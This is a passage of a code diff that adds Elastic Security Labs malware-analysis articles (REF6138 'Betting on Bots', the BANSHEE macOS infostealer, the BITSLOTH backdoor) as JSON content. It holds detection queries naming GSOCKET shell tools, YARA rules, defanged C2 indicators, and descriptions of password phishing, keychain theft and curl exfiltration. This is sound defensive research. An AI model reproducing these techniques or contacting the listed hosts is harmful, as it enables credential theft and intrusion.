\"cn/rto\", \"cn-heavy/tube\", \"cn-heavy/xhv\", \"cn-heavy/0\", \"cn/1\", \"cn-lite/1\",\n \"cn-lite/0\", \"cn/0\"\n )\n ) or\n (\n process.args == \"--coin\" and process.args in (\"monero\", \"arqma\", \"dero\")\n )\n) and process.args in (\"-o\", \"--url\")\n```\n\n**MSR Write Access Enabled**\n\nXMRIG leverages modprobe to enable write access to MSR. This activity is abnormal, and should not occur by-default.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and process.name == \"modprobe\" and\nprocess.args == \"msr\" and process.args == \"allow_writes=on\"\n```\n\n**Potential GSOCKET Activity**\n\nThis activity is default behavior when deploying GSOCKET through the recommended deployment methods. Additionally, several arguments are added to the query to decrease the chances of missing a more customized intrusion through GSOCKET. \n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and\nprocess.command_line : (\n\"*GS_ARGS=*\", \"*gs-netcat*\", \"*gs-sftp*\", \"*gs-mount*\", \"*gs-full-pipe*\", \"*GS_NOINST=*\", \"*GSOCKET_ARGS=*\", \"*GS_DSTDIR=*\", \"*GS_URL_BASE=*\", \"*GS_OSARCH=*\", \"*GS_DEBUG=*\", \"*GS_HIDDEN_NAME=*\", \"*GS_HOST=*\", \"*GS_PORT=*\", \"*GS_TG_TOKEN=*\", \"*GS_TG_CHATID=*\", \"*GS_DISCORD_KEY=*\", \"*GS_WEBHOOK_KEY=*\"\n)\n```\n\n**Potential Process Masquerading via Exec**\n\nGSOCKET leverages the `exec -a` method to run a process under a different name. GSOCKET specifically leverages masquerades as kernel processes, but other malware may masquerade differently. \n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and process.command_line : \"* exec -a *\"\n```\n\n**Renice or Ulimit Execution**\n\nSeveral malwares, including KAIJI and RUDEDEVIL, leverage the renice utility to change the priority of processes or set resource limits for processes. This is commonly used by miner malware to increase the priority of mining processes to maximize the mining performance.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and (\n process.name in (\"ulimit\", \"renice\") or (\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and\n process.command_line : (\"*ulimit*\", \"*renice*\")\n )\n)\n```\n\n**Inexistent Cron(d) Service Started**\n\nBoth KAIJI and RUDEDEVIL establish persistence through the creation of a `cron(d)` service in `/etc/init.d/cron(d)`. `Cron`, by default, does not use a `SysV Init` service. Execution of a `cron(d)` service is suspicious, and should be analyzed further.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and \n process.name == \"systemctl\" and process.args == \"start\" and process.args in \n (\"cron.service\", \"crond.service\", \"cron\", \"crond\")\n```\n\n**Suspicious /etc/ Process Execution from KAIJI**\n\nThe `/etc/` directory is not a commonly used directory for process executions. KAIJI is known to place a binary called `32678` and `id.services.conf` in the `/etc/` directory, to establish persistence and evade detection.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and (process.executable regex \"\"\"/etc/[0-9].*\"\"\" or process.executable : (\"/etc/*.conf\", \"/etc/.*\"))\n```\n\n**Hidden File Creation in /dev/ directory**\n\nCreating hidden files in `/dev/` and `/dev/shm/` are not inherently malicious, however, this activity should be uncommon. KAIJI, GSOCKET and other malwares such as `K4SPREADER` are known to drop hidden files in these locations.\n\n```\nfile where event.type == \"creation\" and file.path : (\"/dev/shm/.*\", \"/dev/.*\")\n```\n\n**Suspicious Process Execution from Parent Executable in /boot/**\n\nMalwares such as KAIJI and XORDDOS are known to place executable files in the `/boot/` directory, and leverage these to establish persistence while attempting to evade detection.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and process.parent.executable : \"/boot/*\"\n```\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. Below is the YARA rule to identify the custom `Apache2` malware:\n\n```\nrule Linux_Trojan_Generic {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-09-20\"\n last_modified = \"2024-09-20\"\n os = \"Linux\"\n arch = \"x86\"\n threat_name = \"Linux.Trojan.Generic\"\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\n license = \"Elastic License v2\"\n\n strings:\n $enc1 = { 74 73 0A 1C 1A 54 1A 11 54 0C 18 43 59 5B 3A 11 0B 16 14 10 0C 14 5B }\n $enc2 = { 18 1A 1A 1C 09 0D 43 59 0D 1C 01 0D 56 11 0D 14 15 55 18 09 09 15 10 }\n $enc3 = { 18 1A 1A 1C 09 0D 54 15 18 17 1E 0C 18 1E 1C 43 59 0B 0C }\n $enc4 = { 34 16 03 10 15 15 18 56 4C 57 49 59 51 2E 10 17 1D 16 0E 0A 59 37 }\n $key = \"yyyyyyyy\"\n condition:\n 1 of ($enc*) and $key\n}\n```\n\nTo detect GSOCKET, including several of its adjacent tools, we created the following signature:\n\n```\nrule Multi_Hacktool_Gsocket {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-09-20\"\n last_modified = \"2024-09-23\"\n os = \"Linux, MacOS\"\n arch = \"x86\"\n threat_name = \"Multi.Hacktool.Gsocket\"\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\n license = \"Elastic License v2\"\n\n strings:\n $str1 = \"gsocket: gs_funcs not found\"\n $str2 = \"/share/gsocket/gs_funcs\"\n $str3 = \"$GSOCKET_ARGS\"\n $str4 = \"GSOCKET_SECRET\"\n $str5 = \"GS_HIJACK_PORTS\"\n $str6 = \"sftp -D gs-netcat\"\n $str7 = \"GS_NETCAT_BIN\"\n $str8 = \"GSOCKET_NO_GREETINGS\"\n $str9 = \"GS-NETCAT(1)\"\n $str10 = \"GSOCKET_SOCKS_IP\"\n $str11 = \"GSOCKET_SOCKS_PORT\"\n $str12 = \"gsocket(1)\"\n $str13 = \"gs-sftp(1)\"\n $str14 = \"gs-mount(1)\"\n condition:\n 3 of them\n}\n```\n\nFinally, the following signature was written to detect the [open source Ligolo-ng tool](https://github.com/nicocha30/ligolo-ng), as we have reason to believe this tool was used during this intrusion.\n\n\n```\nrule Linux_Hacktool_LigoloNG {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-09-20\"\n last_modified = \"2024-09-20\"\n os = \"Linux\"\n arch = \"x86\"\n threat_name = \"Linux.Hacktool.LigoloNG\"\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\n license = \"Elastic License v2\"\n\n strings:\n $a = \"https://github.com/nicocha30/ligolo-ng\"\n $b = \"@Nicocha30!\"\n $c = \"Ligolo-ng %s / %s / %s\"\n condition:\n all of them\n}\n```\n\n### Defensive recommendations\n\nTo effectively defend against malware campaigns and minimize the risk of intrusion, it’s crucial to implement a multi-layered approach to security. Here are some key defensive measures you should prioritize:\n\n1. **Keep Your Elastic Detection Rules Updated and Enabled**: Ensure that your security tools, including any pre-built detection rules, are up to date. Continuous updates allow your systems to detect the latest malware signatures and behaviors.\n2. **Enable Prevention Mode in Elastic Defend**: Configure Elastic Defend in prevention mode to automatically block known threats rather than just alerting on them. Prevention mode ensures proactive defense against malware and exploits.\n3. **Monitor Alerts and Logs**: Regularly monitor alerts, logs, and servers for any signs of suspicious activity. Early detection of unusual behavior can help prevent a small breach from escalating into a full-blown compromise.\n4. **Conduct Threat Hunting**: Proactively investigate your environment for hidden threats that may have evaded detection. Threat hunting can uncover advanced attacks and persistent malware that bypass traditional security measures.\n5. **Implement Web Application Firewalls (WAFs)**: Use a WAF to block unauthorized or malicious traffic. A properly configured firewall can prevent many common web attacks.\n6. **Enforce Strong Authentication for SSH**: Use public/private key authentication for SSH access to protect against brute force attacks.\n7. **Write Secure Code**: Ensure that all custom software, especially web server technology, follows secure coding practices. Engaging professional security auditors to review your code can help identify and mitigate vulnerabilities before they are exploited.\n8. **Regularly Patch and Update Systems**: Keeping servers, applications, and software up to date is essential to defending against known vulnerabilities. Prompt patching minimizes the risk of being targeted by off-the-shelf exploits.\n\nBy following these recommendations, you can significantly reduce the attack surface and strengthen your defense against ongoing or potential malware threats.\n\n## Observations\n\nThe following observables were discussed in this research. These are available for download in STIX or ECS format [here](https://github.com/elastic/labs-releases/tree/main/indicators/ref6138).\n\n| Observable | Type | Name | Reference |\n|-------------------------------------------------------------------------------------------------|-------------|------------------------|------------------------------------|\n| 72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f | SHA-256 | SystemdXC | XMRIG |\n| 82c55c169b6cb5e348be6e202163296b2b5d80fff2be791c21da9a8b84188684 | SHA-256 | apache2 | apache2_unpacked |\n| 0fede7231267afc03b096ee6c1d3ded479b10ab235e260120bc9f68dd1fc54dd | SHA-256 | apache2_upx_packed | apache2_upx_packed |\n| 9ee695e55907a99f097c4c0ad4eb24ae5cf3f8215e9904d787817f1becb9449e | SHA-256 | download.sh | KAIJI Stager |\n| 1cdfb522acb1ad0745a4b88f072e40bf9aa113b63030fe002728bac50a46ae79 | SHA-256 | linux_386 | KAIJI x86 |\n| d0ef2f020082556884361914114429ed82611ef8de09d878431745ccd07c06d8 | SHA-256 | linux_amd64 | KAIJI x64 |\n| ad36cf59b5eb08799a50e9aece6f12cdfe8620062606ac6684d3b4509acc681b | SHA-256 | linux_arm5 | KAIJI ARM5 |\n| 792a84a5bc8530285e2f6eb997054edb3d43460a99a089468e2cf81b5fd5cde6 | SHA-256 | linux_arm6 | KAIJI ARM6 |\n| e19fb249db323d2388e91f92ff0c8a7a169caf34c3bdaf4d3544ce6bfb8b88b4 | SHA-256 | linux_arm64 | KAIJI ARM64 |\n| 3847c06f95dd92ec482212116408286986bb4b711e27def446fb4a524611b745 | SHA-256 | linux_arm7 | KAIJI ARM7 |\n| fffee23324813743b8660282ccd745daa6fb058f2bf84b9960f70d888cd33ba0 | SHA-256 | linux_mips | KAIJI MIPS |\n| 6d40b58e97c7b4c34f7b5bdac88f46e943e25faa887e0e6ce5f2855008e83f55 | SHA-256 | linux_mips64 | KAIJI MIPS64 |\n| 0c3442b8c49844a1ee41705a9e4a710ae3c7cde76c69c2eab733366b2aa34814 | SHA-256 | linux_mips64el | KAIJI MIPS64 little-endian |\n| 310973f6f186947cb7cff0e7b46b4645acdd71e90104f334caa88a4fa8ad9988 | SHA-256 | linux_mips_softfloat | KAIJI MIPS softfloat |\n| 0d24a2e7da52bad03b0bda45c8435a29c4e1c9b483e425ae71b79fd122598527 | SHA-256 | linux_mipsel | KAIJI MIPS little-endian |\n| 36fc8eef2e1574e00ba3cf9e2267d4d295f6e9f138474e3bd85eb4d215f63196 | SHA-256 | linux_mipsel_softfloat | KAIJI MIPS little-endian softfloat |\n| 3c25a4406787cc5089e83e00350e49eb9f192d03d69e7a61b780b6828db1344f | SHA-256 | linux_ppc64 | KAIJI PPC64 |\n| 7c16149db7766c6fd89f28031aa123408228f045e90aa03828c02562d9f9d1d7 | SHA-256 | linux_ppc64el | KAIJI PPC64 little-endian |\n| 09f935acbac36d224acfb809ad82c475d53d74ab505f057f5ac40611d7c3dbe7 | SHA-256 | l64_v0 | RUDEDEVIL/LUFICER x64 version 0 |\n| ea0068702ea65725700b1dad73affe68cf29705c826d12a497dccf92d3cded46 | SHA-256 | l64_v1 | RUDEDEVIL/LUFICER x64 version 1 |\n| 160f232566968ade54ee875def81fc4ca69e5507faae0fceb5bef6139346496a | SHA-256 | l64_v2 | RUDEDEVIL/LUFICER x64 version 2 |\n| 89b60cedc3a4efb02ceaf629d6675ec9541addae4689489f3ab8ec7741ec8055 | SHA-256 | l64_v3 | RUDEDEVIL/LUFICER x64 version 3 |\n| 20899c5e2ecd94b9e0a8d1af0114332c408fb65a6eb3837d4afee000b2a0941b | SHA-256 | l86_v0 | RUDEDEVIL/LUFICER x86 version 0 |\n| 728dce11ffd7eb35f80553d0b2bc82191fe9ff8f0d0750fcca04d0e77d5be28c | SHA-256 | l86_v1 | RUDEDEVIL/LUFICER x86 version 1 |\n| 47ceca049bfcb894c9a229e7234e8146d8aeda6edd1629bc4822ab826b5b9a40 | SHA-256 | l86_v2 | RUDEDEVIL/LUFICER x86 version 2 |\n| e89f4073490e48aa03ec0256d0bfa6cf9c9ac6feb271a23cb6bc571170d1bcb5 | SHA-256 | l86_v3 | RUDEDEVIL/LUFICER x86 version 3 |\n| d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60 | SHA-256 | hjvhg.exe | Miner |\n| 54a5c82e4c68c399f56f0af6bde9fb797122239f0ebb8bcdb302e7c4fb02e1de | SHA-256 | mvhhvcp3.exe | DONUT LOADER |\n| 9e32be17b25d3a6c00ebbfd03114a0947361b4eaf4b0e9d6349cbb95350bf976 | SHA-256 | vdfgb.exe | Miner |\n| http://gcp.pagaelrescate[.]com:8080/ifindyou | url | ifindyou.sh | Stage 1 |\n| http://gcp.pagaelrescate[.]com:8080/cycnet | url | cycnet.sh | Stage 2 |\n| http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | url | Enviador_slot.py | Stage 3 |\n| http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC | url | SystemdXC | XMRIG |\n| http://38.54.125[.]192:8080/nginx-rc | url | nginx-rc | LIGOLO-NG |\n| http://62.72.22[.]91/apache2 | url | apache2 | Custom Malware |\n| http://62.72.22[.]91/apache2v86 | url | apache2v86 | Custom Malware |\n| http://91.92.241[.]103:8002/gk.php | url | gk.php | PHP Backdoor |\n| http://hfs.t1linux[.]com:7845/scdsshfk | url | scdsshfk | XMRIG |\n| gcp.pagaelrescate[.]com | domain-name | | REF Hosting domain |\n| nishabii[.]xyz | domain-name | | RUDEDEVIL C2 |\n| 3.147.53[.]183 | ipv4-addr | | Python Reverse Shell C2 |\n| 38.54.125[.]192 | ipv4-addr | | C2 Server |\n| 107.178.101[.]245 | ipv4-addr | | Malware File Server (Rejetto) |\n| 62.72.22[.]91 | ipv4-addr | | Server Hosting Malware |\n| 91.92.241[.]103 | ipv4-addr | | C2 Server |\n| 61.160.194[.]160 | ipv4-addr | | Server Hosting Malware |\n| 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL | XMR Wallet | | RUDEDEVIL/LUFICER mining wallet |\n| 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc | XMR Wallet | | RUDEDEVIL/LUFICER mining wallet |\n| 1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz | BTC Wallet | | XMRIG mining wallet |\n\n## References\n\nThe following were referenced throughout the above research:\n\n* [https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html](https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html)\n* [https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/)\n* [https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities](https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities)\n* [https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/](https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/)\n* [https://github.com/hackerschoice/gsocket](https://github.com/hackerschoice/gsocket)"
+ },
+ "title": "Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse",
+ "slug": "betting-on-bots",
+ "date": "2024-09-27",
+ "description": "The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels.",
+ "author": [
+ {
+ "slug": "remco-sprooten"
+ },
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "betting-on-bots.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ },
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "linux",
+ "kaiji",
+ "rudedevil",
+ "gsocket",
+ "cryptomining"
+ ]
+ },
+ "id": "security_labs_content-betting_on_bots-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-beyond_the_wail-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-beyond_the_wail-md.json
new file mode 100644
index 00000000000..f580b1535a6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-beyond_the_wail-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Beyond the wail: deconstructing the BANSHEE infostealer\"\nslug: \"beyond-the-wail\"\ndate: \"2024-08-15\"\ndescription: \"The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"beyond-the-wail.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - macos\n - infostealer\n - BANSHEE\n---\n\n## Preamble\n\nIn August 2024, a novel macOS malware named \"BANSHEE Stealer\" emerged, catching the attention of the cybersecurity community. Reportedly developed by Russian threat actors, BANSHEE Stealer was introduced on an underground forum and is designed to function across both macOS x86_64 and ARM64 architectures. \n\nThis malware presents a severe risk to macOS users, targeting vital system information, browser data, and cryptocurrency wallets.\n\nWith a steep monthly subscription price of $3,000, BANSHEE Stealer stands out in the market, particularly compared to known stealers like AgentTesla. \n\nAs macOS increasingly becomes a prime target for cybercriminals, BANSHEE Stealer underscores the rising observance of macOS-specific malware. This analysis explores the technical details of BANSHEE Stealer, aiming to help the community understand its impact and stay informed about emerging threats.\n\n\n\n\n## Key takeaways\n\n* BANSHEE Stealer highlights the growing number of macOS malware samples as the OS becomes a more attractive target for cyber threats.\n* BANSHEE Stealer's $3,000 monthly price is notably high compared to Windows-based stealers.\n* BANSHEE Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat.\n\n## Malware Analysis\n\nThe malware we analyzed in this research contained all the C++ symbols, which is interesting as we can guess the project's code structure by knowing these source code file names, as seen in the picture below. Looking into the C++-generated global variable initialization functions, we can find values set automatically/manually by the user during the build process, like the remote IP, encryption key, build ID, etc.\n\n\n\nThe following table summarizes the leaked `.cpp` file names through the symbols in the binary.\n\n| File name | Description |\n|----------------|----------------------------------------------------------------------------------------------------------------------|\n| `Controller.cpp` | Manages core execution tasks, including anti-debugging measures, language checks, data collection, and exfiltration. |\n| `Browsers.cpp` | Handles the collection of data from various web browsers. |\n| `System.cpp` | Executes AppleScripts to gather system information and perform password phishing. |\n| `Tools.cpp` | Provides utility functions for encryption, directory creation, and compression etc. |\n| `Wallets.cpp` | Responsible for collecting data from cryptocurrency wallets. |\n\n### Debugger, VM Detection, and Language Checks\n\n\n\nBANSHEE Stealer uses basic techniques to evade detection. It detects debugging by utilizing the [sysctl](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/sysctl.3.html) API.\n\n\n\nFor virtualization detection, it runs the command `system_profiler SPHardwareDataType | grep 'Model Identifier'` to determine whether the string `Virtual` appears in the hardware model identifier, which suggests a virtual machine. These methods are relatively simple and can be easily circumvented by advanced sandboxes and malware analysts.\n\n\n\nAdditionally, It parses the user-preferred canonicalized language returned from the [CFLocaleCopyPreferredLanguages ](https://developer.apple.com/documentation/corefoundation/1542887-cflocalecopypreferredlanguages) API and looks for the string `ru`. This tactic helps the malware avoid infecting systems where Russian is the primary language.\n\n### System information collection\n\n#### User password\n\nThe malware creates an [Osascript](https://ss64.com/mac/osascript.html) password prompt with a dialog saying that to launch the application, you need to update the system settings. Please enter your password.\n\nWhen the user enters the password, it will be validated using the [dscl](https://ss64.com/mac/dscl.html) command by running `dscl Local/Default -authonly `\n\nIf valid, the password will be written to the following file `/Users//password-entered`.\n\n\n\nThese credentials can be leveraged to decrypt the keychain data stored on the system, granting access to all saved passwords.\n\n#### File, software, and hardware information collection\n\nThe function `System::collectSystemInfo` collects system information and serializes it in a JSON object. It executes the command `system_profiler SPSoftware DataType SPHardwareDataType`, which provides details about the system’s software and hardware. It gets the machine's public IP by requesting it from `freeipapi.com` through the built-in macOS `cURL` command.\n\nThe JSON file will be saved under `/system_info.json`\n\nBANSHEE stealer executes AppleScripts; interestingly, it writes the AppleScripts to the same file `/tmp/tempAppleScript`.\n\nThe first script to be executed first mutes the system sound with `osascript -e 'set volume with output muted'` command. It then collects various files from the system, which are listed below:\n\n* Safari cookies\n* Notes database\n* Files with the following extensions `.txt`, `.docx`, `.rtf`, `.doc`, `.wallet`, `.keys`, or `.key` from the Desktop and Documents folders.\n\n#### Dump keychain passwords\n\nIt copies the keychain of the system `/Library/Keychains/login.keychain-db` to `/Passwords`\n\n### Browser collection\n\nBANSHEE collects data from 9 different browsers currently, including browser history, cookies, logins, etc:\n\n* Chrome\n* Firefox\n* Brave\n* Edge\n* Vivaldi\n* Yandex\n* Opera\n* OperaGX\n\nRegarding Safari, only the cookies are collected by the AppleScript script for the current version.\n\n\n\nAdditionally, data from approximately 100 browser plugins are collected from the machine. A list of these extension IDs is provided at the end of the blog post.\n\nThe collected files are saved under `/Browsers`.\n\n### Wallet collection\n\n* Exodus\n* Electrum\n* Coinomi\n* Guarda\n* Wasabi Wallet\n* Atomic\n* Ledger\n\nThe collected wallets are stored under `/Wallets`.\n\n### Exfiltration\n\nAfter the malware finishes collecting data, it first ZIP compresses the temporary folder using the `ditto` command. The zip file is then XOR encrypted and base64 encoded and sent through a post request to the URL: `http://45.142.122[.]92/send/` with the built-in cURL command.\n\n\n\n## Behavior detection\n\n* [Crypto Wallet File Access by Unsigned or Untrusted Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_crypto_wallet_file_access_by_unsigned_or_untrusted_binary.toml)\n* [Web Browser Credential Data Accessed by Unsigned or Untrusted Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_web_browser_credential_data_accessed_by_unsigned_or_untrusted_process.toml)\n* [Osascript Payload Drop and Execute](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/command_and_control_osascript_payload_drop_and_execute.toml)\n* [Potential Credentials Phishing via Osascript](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_potential_credentials_phishing_via_osascript.toml)\n\n## YARA rule\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the BANSHEE malware:\n\n```\nrule Macos_Infostealer_Banshee {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-08-13\"\n last_modified = \"2024-08-13\"\n os = \"MacOS\"\n arch = \"x86, arm64\"\n category_type = \"Infostealer\"\n family = \"Banshee\"\n threat_name = \"Macos.Infostealer.Banshee\"\n license = \"Elastic License v2\"\n\n strings:\n $str_0 = \"No debugging, VM, or Russian language detected.\" ascii fullword\n $str_1 = \"Remote IP: \" ascii fullword\n $str_2 = \"Russian language detected!\" ascii fullword\n $str_3 = \" is empty or does not exist, skipping.\" ascii fullword\n $str_4 = \"Data posted successfully\" ascii fullword\n $binary_0 = { 8B 55 BC 0F BE 08 31 D1 88 08 48 8B 45 D8 48 83 C0 01 48 89 45 D8 E9 }\n $binary_1 = { 48 83 EC 60 48 89 7D C8 48 89 F8 48 89 45 D0 48 89 7D F8 48 89 75 F0 48 89 55 E8 C6 45 E7 00 }\n condition:\n all of ($str_*) or all of ($binary_*)\n}\n```\n\n## Conclusion\n\nBANSHEE Stealer is macOS-based malware that can collect extensive data from the system, browsers, cryptocurrency wallets, and numerous browser extensions. Despite its potentially dangerous capabilities, the malware's lack of sophisticated obfuscation and the presence of debug information make it easier for analysts to dissect and understand. While BANSHEE Stealer is not overly complex in its design, its focus on macOS systems and the breadth of data it collects make it a significant threat that demands attention from the cybersecurity community.\n\n## Observables\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/banshee) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-----------|-----------------|--------------------|\n| 11aa6eeca2547fcf807129787bec0d576de1a29b56945c5a8fb16ed8bf68f782 | SHA-256 | BANSHEE stealer | |\n| 45.142.122[.]92 | ipv4-addr | | BANSHEE stealer C2 |"
+ },
+ "title": "Beyond the wail: deconstructing the BANSHEE infostealer",
+ "slug": "beyond-the-wail",
+ "date": "2024-08-15",
+ "description": "The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "beyond-the-wail.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "macos",
+ "infostealer",
+ "BANSHEE"
+ ]
+ },
+ "id": "security_labs_content-beyond_the_wail-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bits_and_bytes_analyzing_bitsloth-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bits_and_bytes_analyzing_bitsloth-md.json
new file mode 100644
index 00000000000..c62466ec795
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bits_and_bytes_analyzing_bitsloth-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor\"\nslug: \"bits-and-bytes-analyzing-bitsloth\"\ndate: \"2024-08-01\"\ndescription: \"Elastic Security Labs identified a novel Windows backdoor leveraging the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group tracked as REF8747.\"\nauthor:\n - slug: seth-goodwin\n - slug: daniel-stepanic\nimage: \"Security Labs Images 29.jpg\"\ncategory:\n - slug: malware-analysis\n---\n\n## BITSLOTH at a glance\n\nBITSLOTH is a newly discovered Windows backdoor that leverages the Background Intelligent Transfer Service (BITS) as its command-and-control mechanism. BITSLOTH was uncovered during an intrusion within the LATAM region earlier this summer. This malware hasn't been publicly documented to our knowledge and while it’s not clear who’s behind the malware, it has been in development for several years based on tracking distinct versions uploaded to VirusTotal.\n\nThe most current iteration of the backdoor at the time of this publication has 35 handler functions including keylogging and screen capture capabilities. In addition, BITSLOTH contains many different features for discovery, enumeration, and command-line execution. Based on these capabilities, we assess this tool is designed for gathering data from victims.\n\n### Key takeaways\n\n - BITSLOTH is a newly discovered Windows backdoor\n - BITSLOTH uses a built-in Microsoft feature, Background Intelligent Transfer Service (BITS) for command-and-control communication \n - BITSLOTH has numerous command handlers used for discovery/enumeration, execution, and collection purposes\n - The backdoor contains logging functions and strings consistent with the authors being native Chinese speakers\n\n## Discovery\n\nOur team observed BITSLOTH installed on a server environment on June 25th during REF8747, this was an intrusion into the Foreign Ministry of a South American government. The intrusion was traced back to PSEXEC execution on one of the infected endpoints. The attackers used a slew of publicly available tools for most of their operations with the exception of BITSLOTH.\n\n - [RINGQ](https://github.com/T4y1oR/RingQ)\n - [IOX](https://github.com/EddieIvan01/iox)\n - [STOWAWAY](https://github.com/ph4ntonn/Stowaway)\n - [GODPOTATO](https://github.com/BeichenDream/GodPotato)\n - [NOPAC](https://github.com/Ridter/noPac)\n - [MIMIKATZ](https://github.com/gentilkiwi/mimikatz)\n - [PPLFAULT](https://github.com/gabriellandau/PPLFault)\n - [CERTIFY](https://github.com/GhostPack/Certify)\n\nOne of the primary mechanisms of execution was through a shellcode loading project called RINGQ. In a similar fashion to DONUTLOADER, RINGQ will convert any Windows executable and generate custom shellcode placing it into a file ( main.txt). This shellcode gets decrypted and executed in-memory. This technique is used bypass defenses that rely on hash blocklists or static signatures in some anti-malware products.\n\n\n\nWe observed RINGQ being used to load the IOX port forwarder. Note: The key in the image below is the hex conversion of “whoami”.\n\n\n\nAdditionally the attackers used the STOWAWAY utility to proxy encrypted traffic over HTTP to their C2 servers. Proxy tools, tunnelers, and redirectors are commonly used during intrusions to conceal the adversary responsible for an intrusion. These tools offer adversaries various features, including the ability to bypass internal network controls, provide terminal interfaces, encryption capabilities as well as file transfer options.\n\n\n\nAfter initial access, the actor moved laterally and dropped BITSLOTH in the form of a DLL (```flengine.dll```) inside the ProgramData directory. The actor then executed the music-making program FL Studio (```fl.exe```). Based on the observed call stack associated with the self-injection alert, we confirmed the threat actor used a traditional side-loading technique using a signed version of [FL Studio](https://www.virustotal.com/gui/file/75747c8b5b3676abde25a8dd66280908c0d0fc57ef054b88a41673619d3bee28/details). \n\n```\n c:\\windows\\syswow64\\ntdll.dll!0x770841AC\n c:\\windows\\syswow64\\ntdll.dll!0x7709D287\n c:\\windows\\syswow64\\kernelbase.dll!0x76ED435F\n c:\\windows\\syswow64\\kernelbase.dll!0x76ED42EF\n Unbacked!0x14EAB23\n Unbacked!0x14EA8B6\n c:\\programdata\\pl studio\\flengine.dll!0x74AD2F2E\n c:\\programdata\\pl studio\\fl.exe!0xDB3985\n c:\\programdata\\pl studio\\fl.exe!0xDB3E5E\n c:\\programdata\\pl studio\\fl.exe!0xDB4D3F\n c:\\windows\\syswow64\\kernel32.dll!0x76B267F9\n c:\\windows\\syswow64\\ntdll.dll!0x77077F4D\n c:\\windows\\syswow64\\ntdll.dll!0x77077F1B\n```\n\nThis call stack was generated along with a process injection alert, and enabled researchers to extract an in-memory DLL that was set with Read/Write/Execute(RWX) page protections.\n\n#### BITSLOTH overview\n\nDuring our analysis, we found several older BITSLOTH samples demonstrating a record of development since December 2021. 